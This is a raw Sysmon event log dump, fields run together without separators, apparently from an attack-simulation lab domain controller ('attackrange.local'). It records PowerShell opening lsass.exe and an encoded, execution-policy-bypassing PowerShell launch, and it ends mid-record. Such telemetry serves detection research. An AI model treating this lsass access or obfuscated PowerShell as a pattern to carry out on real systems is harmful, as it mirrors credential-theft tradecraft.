08:40:23.774{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000112Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.727{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000111Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.727{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000110Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.680{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_q2oablqw.104.ps12020-10-12 08:40:23.680 10341000x8000000000000000109Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.680{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000108Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1677-5F84-F702-000000007E01}43642676C:\Windows\system32\conhost.exe{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000107Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000106Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000105Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000104Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000103Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000102Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000101Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1677-5F84-F902-000000007E01}4384744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+362432a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+36195466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356a4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35702e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356d82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+36195466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356cac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356ca232(wow64) 10341000x8000000000000000100Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000099Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000098Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000097Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.649{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x800000000000000096Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.654{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1677-5F84-B55C-110000000000}0x115cb50HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-1677-5F84-F902-000000007E01}4384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000095Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 